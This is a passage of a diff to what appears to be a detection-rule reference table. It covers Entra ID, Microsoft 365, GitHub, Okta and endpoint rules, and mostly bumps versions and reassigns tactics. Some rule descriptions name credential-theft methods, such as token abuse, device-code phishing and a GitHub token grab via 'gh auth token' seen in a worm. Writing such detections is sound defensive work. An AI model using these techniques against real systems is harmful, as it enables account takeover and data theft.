Microsoft operations use actor tokens, unexpected usage may indicate exploitation of CVE-2025-55241, which allowed unauthorized access to Azure AD Graph API across tenants before being patched by Microsoft. |[Domain: Cloud], [Domain: Identity], [Data Source: Azure], [Data Source: Entra ID], [Data Source: Entra Audit Logs], [Use Case: Identity and Access Audit], [Use Case: Threat Detection], [Tactic: Initial Access], [Tactic: Privilege Escalation], [Resources: Investigation Guide] |None |1 + +|<> |Identifies device code authentication with an Azure broker client for Entra ID. Adversaries abuse Primary Refresh Tokens (PRTs) to bypass multi-factor authentication (MFA) and gain unauthorized access to Azure resources. PRTs are used in Conditional Access policies to enforce device-based controls. Compromising PRTs allows attackers to bypass these policies and gain unauthorized access. This rule detects successful sign-ins using device code authentication with the Entra ID broker client application ID (29d9ed98-a469-4536-ade2-f981bc1d605e). |[Domain: Cloud], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Use Case: Identity and Access Audit], [Tactic: Initial Access], [Resources: Investigation Guide] |None |5 + +|<> |In Microsoft Entra ID, permissions to manage resources are assigned using roles. The Global Administrator is a role that enables users to have access to all administrative features in Microsoft Entra ID and services that use Microsoft Entra ID identities like the Microsoft 365 Defender portal, the Microsoft 365 compliance center, Exchange, SharePoint Online, and Skype for Business Online. Attackers can add users as Global Administrators to maintain access and manage all subscriptions and their settings and resources. They can also elevate privilege to User Access Administrator to pivot into Azure resources. |[Domain: Cloud], [Domain: Identity], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Data Source: Microsoft Entra ID Audit Logs], [Use Case: Identity and Access Audit], [Tactic: Persistence], [Resources: Investigation Guide] |None |106 |<> |Identifies when multi-factor authentication (MFA) is disabled for an Entra ID user account. An adversary may disable MFA for a user account in order to weaken the authentication requirements for the account. |[Domain: Cloud], [Domain: Identity], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Data Source: Microsoft Entra ID Audit Logs], [Use Case: Identity and Access Audit], [Resources: Investigation Guide], [Tactic: Persistence] |None |109 @@ -680,7 +694,7 @@ and their rule type is `machine_learning`. |<> |Identifies user risk detection events via Microsofts Entra ID Protection service. Entra ID Protection detects user risk activity such as anonymized IP addresses, unlikely travel, password spray, and more. |[Domain: Cloud], [Domain: Identity], [Data Source: Azure], [Data Source: Entra ID], [Use Case: Identity and Access Audit], [Use Case: Threat Detection], [Use Case: Risk Detection], [Tactic: Initial Access], [Resources: Investigation Guide] |None |2 -|<> |Identifies when a user signs in with a refresh token using the Microsoft Authentication Broker (MAB) client, followed by a Primary Refresh Token (PRT) sign-in from the same device within 1 hour. This pattern may indicate that an attacker has successfully registered a device using ROADtx and transitioned from short-term token access to long-term persistent access via PRTs. Excluding access to the Device Registration Service (DRS) ensures the PRT is being used beyond registration, often to access Microsoft 365 resources like Outlook or SharePoint. |[Domain: Cloud], [Domain: Identity], [Use Case: Threat Detection], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Data Source: Microsoft Entra ID Sign-In Logs], [Tactic: Persistence], [Tactic: Initial Access], [Resources: Investigation Guide] |None |1 +|<> |Identifies when a user signs in with a refresh token using the Microsoft Authentication Broker (MAB) client, followed by a Primary Refresh Token (PRT) sign-in from the same device within 1 hour. This pattern may indicate that an attacker has successfully registered a device using ROADtx and transitioned from short-term token access to long-term persistent access via PRTs. Excluding access to the Device Registration Service (DRS) ensures the PRT is being used beyond registration, often to access Microsoft 365 resources like Outlook or SharePoint. |[Domain: Cloud], [Domain: Identity], [Use Case: Threat Detection], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Data Source: Microsoft Entra ID Sign-In Logs], [Tactic: Persistence], [Tactic: Initial Access], [Resources: Investigation Guide] |None |2 |<> |Identifies when a Microsoft Entra ID user signs in from a device that is not typically used by the user, which may indicate potential compromise or unauthorized access attempts. This rule detects unusual sign-in activity by comparing the device used for the sign-in against the user's typical device usage patterns. Adversaries may create and register a new device to obtain a Primary Refresh Token (PRT) and maintain persistent access. |[Domain: Cloud], [Domain: Identity], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Data Source: Microsoft Entra ID Sign-in Logs], [Resources: Investigation Guide] |None |1 @@ -704,7 +718,7 @@ and their rule type is `machine_learning`. |<> |Identifies an excessive number of Microsoft 365 mailbox items accessed by a user either via aggregated counts or throttling. Microsoft audits mailbox access via the MailItemsAccessed event, which is triggered when a user accesses mailbox items. If more than 1000 mailbox items are accessed within a 24-hour period, it is then throttled. Excessive mailbox access may indicate an adversary attempting to exfiltrate sensitive information or perform reconnaissance on a target's mailbox. This rule detects both the throttled and unthrottled events with a high threshold. |[Domain: Cloud], [Domain: Email], [Data Source: Microsoft 365], [Data Source: Microsoft 365 Audit Logs], [Use Case: Threat Detection], [Tactic: Collection], [Resources: Investigation Guide] |None |1 -|<> |Identifies excessive secret or key retrieval operations from Azure Key Vault. This rule detects when a user principal retrieves secrets or keys from Azure Key Vault multiple times within a short time frame, which may indicate potential abuse or unauthorized access attempts. The rule focuses on high-frequency retrieval operations that deviate from normal user behavior, suggesting possible credential harvesting or misuse of sensitive information. |[Domain: Cloud], [Domain: Storage], [Domain: Identity], [Data Source: Azure], [Data Source: Azure Platform Logs], [Data Source: Azure Key Vault], [Use Case: Threat Detection], [Use Case: Identity and Access Audit], [Tactic: Credential Access], [Resources: Investigation Guide] |None |2 +|<> |Identifies excessive secret or key retrieval operations from Azure Key Vault. This rule detects when a user principal retrieves secrets or keys from Azure Key Vault multiple times within a short time frame, which may indicate potential abuse or unauthorized access attempts. The rule focuses on high-frequency retrieval operations that deviate from normal user behavior, suggesting possible credential harvesting or misuse of sensitive information. |[Domain: Cloud], [Domain: Storage], [Domain: Identity], [Data Source: Azure], [Data Source: Azure Platform Logs], [Data Source: Azure Key Vault], [Use Case: Threat Detection], [Use Case: Identity and Access Audit], [Tactic: Credential Access], [Resources: Investigation Guide] |None |3 |<> |Identifies the use of the Exchange PowerShell cmdlet, New-MailBoxExportRequest, to export the contents of a primary mailbox or archive to a .pst file. Adversaries may target user email to collect sensitive information. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Collection], [Resources: Investigation Guide], [Data Source: PowerShell Logs] |None |213 @@ -800,7 +814,7 @@ and their rule type is `machine_learning`. |<> |Detects a first occurrence event for a personal access token (PAT) not seen in the last 14 days. |[Domain: Cloud], [Use Case: Threat Detection], [Use Case: UEBA], [Tactic: Execution], [Rule Type: BBR], [Data Source: Github] |None |206 -|<> |Identifies when a user is observed for the first time in the last 14 days authenticating using the device code authentication workflow. This authentication workflow can be abused by attackers to phish users and steal access tokens to impersonate the victim. By its very nature, device code should only be used when logging in to devices without keyboards, where it is difficult to enter emails and passwords. |[Domain: Cloud], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Use Case: Identity and Access Audit], [Tactic: Credential Access], [Resources: Investigation Guide] |None |5 +|<> |Identifies when a user is observed for the first time in the last 14 days authenticating using the device code authentication workflow. This authentication workflow can be abused by attackers to phish users and steal access tokens to impersonate the victim. By its very nature, device code should only be used when logging in to devices without keyboards, where it is difficult to enter emails and passwords. |[Domain: Cloud], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Use Case: Identity and Access Audit], [Tactic: Initial Access], [Resources: Investigation Guide] |None |6 |<> |Detects an interaction with a private GitHub repository from a new IP address not seen in the last 14 days. |[Domain: Cloud], [Use Case: Threat Detection], [Use Case: UEBA], [Tactic: Execution], [Rule Type: BBR], [Data Source: Github] |None |206 @@ -904,6 +918,8 @@ and their rule type is `machine_learning`. |<> |Detects the deletion of a GitHub app either from a repo or an organization. |[Domain: Cloud], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Github], [Resources: Investigation Guide] |None |207 +|<> |This rule detects when the Node.js runtime spawns a shell to execute the GitHub CLI (gh) command to retrieve a GitHub authentication token. The GitHub CLI is a command-line tool that allows users to interact with GitHub from the terminal. The "gh auth token" command is used to retrieve an authentication token for GitHub, which can be used to authenticate API requests and perform actions on behalf of the user. Adversaries may use this technique to access GitHub repositories and potentially exfiltrate sensitive information or perform malicious actions. This activity was observed in the wild as part of the Shai-Hulud worm. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Credential Access], [Tactic: Discovery], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |1 + |<> |This rule detects when a member is granted the organization owner role of a GitHub organization. This role provides admin level privileges. Any new owner role should be investigated to determine its validity. Unauthorized owner roles could indicate compromise within your organization and provide unlimited access to data and settings. |[Domain: Cloud], [Use Case: Threat Detection], [Use Case: UEBA], [Tactic: Persistence], [Data Source: Github], [Resources: Investigation Guide] |None |209 |<> |Access to private GitHub organization resources was revoked for a PAT. |[Domain: Cloud], [Use Case: Threat Detection], [Use Case: UEBA], [Tactic: Impact], [Rule Type: BBR], [Data Source: Github] |None |206 @@ -972,7 +988,7 @@ and their rule type is `machine_learning`. |<> |This rule detects a high number of egress network connections from an unusual executable on a Linux system. This could indicate a command and control (C2) communication attempt, a brute force attack via a malware infection, or other malicious activity. ESQL rules have limited fields available in its alert documents. Make sure to review the original documents to aid in the investigation of this alert. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Command and Control], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |6 -|<> |Detects when an Okta client address has a certain threshold of Okta user authentication events with multiple device token hashes generated for single user authentication. Adversaries may attempt to launch a credential stuffing or password spraying attack from the same device by using a list of known usernames and passwords to gain unauthorized access to user accounts. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Credential Access], [Resources: Investigation Guide] |None |206 +|<> |Detects when an Okta client address has a certain threshold of Okta user authentication events with multiple device token hashes generated for single user authentication. Adversaries may attempt to launch a credential stuffing or password spraying attack from the same device by using a list of known usernames and passwords to gain unauthorized access to user accounts. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Credential Access], [Resources: Investigation Guide] |None |207 |<> |Identifies a high number of Okta user password reset or account unlock attempts. An adversary may attempt to obtain unauthorized access to Okta user accounts using these methods and attempt to blend in with normal activity in their target's environment and evade detection. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |415 @@ -1018,7 +1034,7 @@ and their rule type is `machine_learning`. |<> |Identifies downloads of executable and archive files via the Windows Background Intelligent Transfer Service (BITS). Adversaries could leverage Windows BITS transfer jobs to download remote payloads. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Command and Control], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |11 -|<> |This rule detects the extraction of an initramfs image using the `cpio` command on Linux systems. The `cpio` command is used to create or extract cpio archives. Attackers may extract the initramfs image to modify the contents or add malicious files, which can be leveraged to maintain persistence on the system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Auditd Manager], [Data Source: Crowdstrike], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |4 +|<> |This rule detects the extraction of an initramfs image using the "cpio" command on Linux systems. The "cpio" command is used to create or extract cpio archives. Attackers may extract the initramfs image to modify the contents or add malicious files, which can be leveraged to maintain persistence on the system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Auditd Manager], [Data Source: Crowdstrike], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |5 |<> |This rule detects the unpacking of an initramfs image using the `unmkinitramfs` command on Linux systems. The `unmkinitramfs` command is used to extract the contents of an initramfs image, which is used to boot the system. Attackers may use `unmkinitramfs` to unpack an initramfs image and modify its contents to include malicious code or backdoors, allowing them to maintain persistence on the system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Auditd Manager], [Data Source: Crowdstrike], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |4 @@ -1066,7 +1082,7 @@ and their rule type is `machine_learning`. |<> |Adversaries may collect keychain storage data from a system to in order to acquire credentials. Keychains are the built-in way for macOS to keep track of users' passwords and credentials for many services and features, including Wi-Fi and website passwords, secure notes, certificates, and Kerberos. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |113 -|<> |This rule detects the execution of kill, pkill, and killall commands on Linux systems. These commands are used to terminate processes on a system. Attackers may use these commands to kill security tools or other processes to evade detection or disrupt system operations. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |3 +|<> |This rule detects the execution of kill, pkill, and killall commands on Linux systems. These commands are used to terminate processes on a system. Attackers may use these commands to kill security tools or other processes to evade detection or disrupt system operations. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |4 |<> |Identifies the creation of .kirbi files. The creation of this kind of file is an indicator of an attacker running Kerberos ticket dump utilities, such as Mimikatz, and precedes attacks such as Pass-The-Ticket (PTT), which allows the attacker to impersonate users using Kerberos tickets. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: SentinelOne], [Data Source: Microsoft Defender for Endpoint], [Data Source: Elastic Endgame], [Data Source: Crowdstrike], [Resources: Investigation Guide] |None |314 @@ -1162,7 +1178,7 @@ and their rule type is `machine_learning`. |<> |This rule identifies successful logins by system users that are uncommon to authenticate. These users have `nologin` set by default, and must be modified to allow SSH access. Adversaries may backdoor these users to gain unauthorized access to the system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Defense Evasion], [Data Source: System], [Resources: Investigation Guide] |None |4 -|<> |Identifies when an excessive number of files are downloaded from OneDrive using OAuth authentication. Adversaries may conduct phishing campaigns to steal OAuth tokens and impersonate users. These access tokens can then be used to download files from OneDrive. |[Domain: Cloud], [Domain: SaaS], [Data Source: Microsoft 365], [Data Source: SharePoint], [Data Source: OneDrive], [Use Case: Threat Detection], [Tactic: Collection], [Tactic: Exfiltration], [Resources: Investigation Guide] |None |3 +|<> |Identifies when an excessive number of files are downloaded from OneDrive using OAuth authentication. Adversaries may conduct phishing campaigns to steal OAuth tokens and impersonate users. These access tokens can then be used to download files from OneDrive. |[Domain: Cloud], [Domain: SaaS], [Data Source: Microsoft 365], [Data Source: SharePoint], [Data Source: OneDrive], [Use Case: Threat Detection], [Tactic: Collection], [Tactic: Exfiltration], [Resources: Investigation Guide] |None |4 |<> |Detects successful Microsoft 365 portal logins from rare locations. Rare locations are defined as locations that are not commonly associated with the user's account. This behavior may indicate an adversary attempting to access a Microsoft 365 account from an unusual location or behind a VPN. |[Domain: Cloud], [Domain: SaaS], [Data Source: Microsoft 365], [Data Source: Microsoft 365 Audit Logs], [Use Case: Threat Detection], [Use Case: Identity and Access Audit], [Tactic: Initial Access], [Resources: Investigation Guide] |None |7 @@ -1214,53 +1230,53 @@ and their rule type is `machine_learning`. |<> |This rule detects the creation of potentially malicious files within the default MOTD file directories. Message of the day (MOTD) is the message that is presented to the user when a user connects to a Linux server via SSH or a serial connection. Linux systems contain several default MOTD files located in the "/etc/update-motd.d/" directory. These scripts run as the root user every time a user connects over SSH or a serial connection. Adversaries may create malicious MOTD files that grant them persistence onto the target every time a user connects to the system by executing a backdoor script or command. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Resources: Investigation Guide], [Data Source: Elastic Defend] |None |15 -|<> |Identifies potential brute-force attacks targeting Microsoft 365 user accounts by analyzing failed sign-in patterns in Microsoft Entra ID Sign-In Logs. This detection focuses on a high volume of failed interactive or non-interactive authentication attempts within a short time window, often indicative of password spraying, credential stuffing, or password guessing. Adversaries may use these techniques to gain unauthorized access to Microsoft 365 services such as Exchange Online, SharePoint, or Teams. |[Domain: Cloud], [Domain: SaaS], [Domain: Identity], [Data Source: Azure], [Data Source: Entra ID], [Data Source: Entra ID Sign-in Logs], [Use Case: Identity and Access Audit], [Use Case: Threat Detection], [Tactic: Credential Access], [Resources: Investigation Guide] |None |106 +|<> |Identifies potential brute-force attacks targeting Microsoft 365 user accounts by analyzing failed sign-in patterns in Microsoft Entra ID Sign-In Logs. This detection focuses on a high volume of failed interactive or non-interactive authentication attempts within a short time window, often indicative of password spraying, credential stuffing, or password guessing. Adversaries may use these techniques to gain unauthorized access to Microsoft 365 services such as Exchange Online, SharePoint, or Teams. |[Domain: Cloud], [Domain: SaaS], [Domain: Identity], [Data Source: Azure], [Data Source: Entra ID], [Data Source: Entra ID Sign-in Logs], [Use Case: Identity and Access Audit], [Use Case: Threat Detection], [Tactic: Credential Access], [Resources: Investigation Guide] |None |107 -|<> |Identifies the deletion of an anti-phishing policy in Microsoft 365. By default, Microsoft 365 includes built-in features that help protect users from phishing attacks. Anti-phishing polices increase this protection by refining settings to better detect and prevent attacks. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Configuration Audit], [Tactic: Initial Access], [Resources: Investigation Guide] |None |209 +|<> |Identifies the deletion of an anti-phishing policy in Microsoft 365. By default, Microsoft 365 includes built-in features that help protect users from phishing attacks. Anti-phishing polices increase this protection by refining settings to better detect and prevent attacks. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Configuration Audit], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |210 -|<> |Identifies the modification of an anti-phishing rule in Microsoft 365. By default, Microsoft 365 includes built-in features that help protect users from phishing attacks. Anti-phishing rules increase this protection by refining settings to better detect and prevent attacks. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Configuration Audit], [Tactic: Initial Access], [Resources: Investigation Guide] |None |209 +|<> |Identifies the modification of an anti-phishing rule in Microsoft 365. By default, Microsoft 365 includes built-in features that help protect users from phishing attacks. Anti-phishing rules increase this protection by refining settings to better detect and prevent attacks. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Configuration Audit], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |210 -|<> |Identifies when a DomainKeys Identified Mail (DKIM) signing configuration is disabled in Microsoft 365. With DKIM in Microsoft 365, messages that are sent from Exchange Online will be cryptographically signed. This will allow the receiving email system to validate that the messages were generated by a server that the organization authorized and were not spoofed. |[Domain: Cloud], [Data Source: Microsoft 365], [Tactic: Persistence], [Resources: Investigation Guide] |None |209 +|<> |Identifies when a DomainKeys Identified Mail (DKIM) signing configuration is disabled in Microsoft 365. With DKIM in Microsoft 365, messages that are sent from Exchange Online will be cryptographically signed. This will allow the receiving email system to validate that the messages were generated by a server that the organization authorized and were not spoofed. |[Domain: Cloud], [Data Source: Microsoft 365], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |210 -|<> |Identifies when a Data Loss Prevention (DLP) policy is removed in Microsoft 365. An adversary may remove a DLP policy to evade existing DLP monitoring. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Configuration Audit], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |209 +|<> |Identifies when a Data Loss Prevention (DLP) policy is removed in Microsoft 365. An adversary may remove a DLP policy to evade existing DLP monitoring. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Configuration Audit], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |210 -|<> |Identifies when a malware filter policy has been deleted in Microsoft 365. A malware filter policy is used to alert administrators that an internal user sent a message that contained malware. This may indicate an account or machine compromise that would need to be investigated. Deletion of a malware filter policy may be done to evade detection. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Configuration Audit], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |209 +|<> |Identifies when a malware filter policy has been deleted in Microsoft 365. A malware filter policy is used to alert administrators that an internal user sent a message that contained malware. This may indicate an account or machine compromise that would need to be investigated. Deletion of a malware filter policy may be done to evade detection. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Configuration Audit], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |210 -|<> |Identifies when a malware filter rule has been deleted or disabled in Microsoft 365. An adversary or insider threat may want to modify a malware filter rule to evade detection. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Configuration Audit], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |209 +|<> |Identifies when a malware filter rule has been deleted or disabled in Microsoft 365. An adversary or insider threat may want to modify a malware filter rule to evade detection. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Configuration Audit], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |210 -|<> |Identifies when a new role is assigned to a management group in Microsoft 365. An adversary may attempt to add a role in order to maintain persistence in an environment. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Identity and Access Audit], [Tactic: Persistence], [Resources: Investigation Guide] |None |209 +|<> |Identifies when a new role is assigned to a management group in Microsoft 365. An adversary may attempt to add a role in order to maintain persistence in an environment. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Identity and Access Audit], [Tactic: Persistence], [Resources: Investigation Guide] |None |210 -|<> |Identifies when a safe attachment rule is disabled in Microsoft 365. Safe attachment rules can extend malware protections to include routing all messages and attachments without a known malware signature to a special hypervisor environment. An adversary or insider threat may disable a safe attachment rule to exfiltrate data or evade defenses. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Configuration Audit], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |209 +|<> |Identifies when a safe attachment rule is disabled in Microsoft 365. Safe attachment rules can extend malware protections to include routing all messages and attachments without a known malware signature to a special hypervisor environment. An adversary or insider threat may disable a safe attachment rule to exfiltrate data or evade defenses. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Configuration Audit], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |210 -|<> |Identifies when a Safe Link policy is disabled in Microsoft 365. Safe Link policies for Office applications extend phishing protection to documents that contain hyperlinks, even after they have been delivered to a user. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Identity and Access Audit], [Tactic: Initial Access], [Resources: Investigation Guide] |None |209 +|<> |Identifies when a Safe Link policy is disabled in Microsoft 365. Safe Link policies for Office applications extend phishing protection to documents that contain hyperlinks, even after they have been delivered to a user. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Identity and Access Audit], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |210 -|<> |Identifies a transport rule creation in Microsoft 365. As a best practice, Exchange Online mail transport rules should not be set to forward email to domains outside of your organization. An adversary may create transport rules to exfiltrate data. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Configuration Audit], [Tactic: Exfiltration], [Resources: Investigation Guide] |None |209 +|<> |Identifies a transport rule creation in Microsoft 365. As a best practice, Exchange Online mail transport rules should not be set to forward email to domains outside of your organization. An adversary may create transport rules to exfiltrate data. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Configuration Audit], [Tactic: Exfiltration], [Resources: Investigation Guide] |None |210 -|<> |Identifies when a transport rule has been disabled or deleted in Microsoft 365. Mail flow rules (also known as transport rules) are used to identify and take action on messages that flow through your organization. An adversary or insider threat may modify a transport rule to exfiltrate data or evade defenses. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Configuration Audit], [Tactic: Exfiltration], [Resources: Investigation Guide] |None |209 +|<> |Identifies when a transport rule has been disabled or deleted in Microsoft 365. Mail flow rules (also known as transport rules) are used to identify and take action on messages that flow through your organization. An adversary or insider threat may modify a transport rule to exfiltrate data or evade defenses. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Configuration Audit], [Tactic: Exfiltration], [Resources: Investigation Guide] |None |210 |<> |In Microsoft Entra ID, permissions to manage resources are assigned using roles. The Global Administrator / Company Administrator is a role that enables users to have access to all administrative features in Entra ID and services that use Entra ID identities like the Microsoft 365 Defender portal, the Microsoft 365 compliance center, Exchange, SharePoint Online, and Skype for Business Online. Adversaries can add users as Global Administrators to maintain access and manage all subscriptions and their settings and resources. |[Domain: Cloud], [Domain: SaaS], [Data Source: Microsoft 365], [Data Source: Microsoft 365 Audit Logs], [Use Case: Identity and Access Audit], [Tactic: Persistence], [Resources: Investigation Guide] |None |211 -|<> |Identifies an Microsoft 365 illicit consent grant request on-behalf-of a registered Entra ID application. Adversaries may create and register an application in Microsoft Entra ID for the purpose of requesting user consent to access resources in Microsoft 365. This is accomplished by tricking a user into granting consent to the application, typically via a pre-made phishing URL. This establishes an OAuth grant that allows the malicious client applocation to access resources in Microsoft 365 on-behalf-of the user. |[Domain: Cloud], [Data Source: Microsoft 365], [Data Source: Microsoft 365 Audit Logs], [Use Case: Identity and Access Audit], [Resources: Investigation Guide], [Tactic: Initial Access], [Tactic: Credential Access] |None |4 +|<> |Identifies an Microsoft 365 illicit consent grant request on-behalf-of a registered Entra ID application. Adversaries may create and register an application in Microsoft Entra ID for the purpose of requesting user consent to access resources in Microsoft 365. This is accomplished by tricking a user into granting consent to the application, typically via a pre-made phishing URL. This establishes an OAuth grant that allows the malicious client applocation to access resources in Microsoft 365 on-behalf-of the user. |[Domain: Cloud], [Data Source: Microsoft 365], [Data Source: Microsoft 365 Audit Logs], [Use Case: Identity and Access Audit], [Resources: Investigation Guide], [Tactic: Initial Access], [Tactic: Credential Access] |None |5 -|<> |Identifies when a new Inbox forwarding rule is created in Microsoft 365. Inbox rules process messages in the Inbox based on conditions and take actions. In this case, the rules will forward the emails to a defined address. Attackers can abuse Inbox Rules to intercept and exfiltrate email data without making organization-wide configuration changes or having the corresponding privileges. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Configuration Audit], [Tactic: Collection], [Resources: Investigation Guide] |None |209 +|<> |Identifies when a new Inbox forwarding rule is created in Microsoft 365. Inbox rules process messages in the Inbox based on conditions and take actions. In this case, the rules will forward the emails to a defined address. Attackers can abuse Inbox Rules to intercept and exfiltrate email data without making organization-wide configuration changes or having the corresponding privileges. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Configuration Audit], [Tactic: Collection], [Resources: Investigation Guide] |None |210 |<> |Detects potentially suspicious OAuth authorization activity in Microsoft 365 where the Visual Studio Code first-party application (client_id = aebc6443-996d-45c2-90f0-388ff96faa56) is used to request access to Microsoft Graph resources. While this client ID is legitimately used by Visual Studio Code, threat actors have been observed abusing it in phishing campaigns to make OAuth requests appear trustworthy. These attacks rely on redirect URIs such as VSCode Insiders redirect location, prompting victims to return an OAuth authorization code that can be exchanged for access tokens. This rule may help identify unauthorized use of the VS Code OAuth flow as part of social engineering or credential phishing activity. |[Domain: Cloud], [Domain: SaaS], [Data Source: Microsoft 365], [Data Source: Microsoft 365 Audit Logs], [Use Case: Identity and Access Audit], [Resources: Investigation Guide], [Tactic: Initial Access] |None |2 -|<> |Identifies attempts to register a new device in Microsoft Entra ID after OAuth authentication with authorization code grant. Adversaries may use OAuth phishing techniques to obtain an OAuth authorization code, which can then be exchanged for access and refresh tokens. This rule detects a sequence of events where a user principal authenticates via OAuth, followed by a device registration event, indicating potential misuse of the OAuth flow to establish persistence or access resources. |[Domain: Cloud], [Domain: SaaS], [Data Source: Microsoft 365], [Data Source: Microsoft 365 Audit Logs], [Use Case: Identity and Access Audit], [Tactic: Credential Access], [Resources: Investigation Guide] |None |1 +|<> |Identifies attempts to register a new device in Microsoft Entra ID after OAuth authentication with authorization code grant. Adversaries may use OAuth phishing techniques to obtain an OAuth authorization code, which can then be exchanged for access and refresh tokens. This rule detects a sequence of events where a user principal authenticates via OAuth, followed by a device registration event, indicating potential misuse of the OAuth flow to establish persistence or access resources. |[Domain: Cloud], [Domain: SaaS], [Data Source: Microsoft 365], [Data Source: Microsoft 365 Audit Logs], [Use Case: Identity and Access Audit], [Tactic: Credential Access], [Resources: Investigation Guide] |None |2 -|<> |Identifies when Microsoft Cloud App Security reports that a user has uploaded files to the cloud that might be infected with ransomware. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Configuration Audit], [Tactic: Impact], [Resources: Investigation Guide] |None |209 +|<> |Identifies when Microsoft Cloud App Security reports that a user has uploaded files to the cloud that might be infected with ransomware. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Configuration Audit], [Tactic: Impact], [Resources: Investigation Guide] |None |210 |<> |Identifies when a user creates a new inbox rule in Microsoft 365 that deletes or moves emails containing suspicious keywords. Adversaries who have compromised accounts often create inbox rules to hide alerts, security notifications, or other sensitive messages by automatically deleting them or moving them to obscure folders. Common destinations include Deleted Items, Junk Email, RSS Feeds, and RSS Subscriptions. This is a New Terms rule that triggers only when the user principal name and associated source IP address have not been observed performing this activity in the past 14 days. |[Domain: Cloud], [Domain: SaaS], [Domain: Email], [Data Source: Microsoft 365], [Data Source: Microsoft 365 Audit Logs], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |1 -|<> |Identifies when custom applications are allowed in Microsoft Teams. If an organization requires applications other than those available in the Teams app store, custom applications can be developed as packages and uploaded. An adversary may abuse this behavior to establish persistence in an environment. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Configuration Audit], [Tactic: Persistence], [Resources: Investigation Guide] |None |210 +|<> |Identifies when custom applications are allowed in Microsoft Teams. If an organization requires applications other than those available in the Teams app store, custom applications can be developed as packages and uploaded. An adversary may abuse this behavior to establish persistence in an environment. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Configuration Audit], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |211 -|<> |Identifies when external access is enabled in Microsoft Teams. External access lets Teams and Skype for Business users communicate with other users that are outside their organization. An adversary may enable external access or add an allowed domain to exfiltrate data or maintain persistence in an environment. 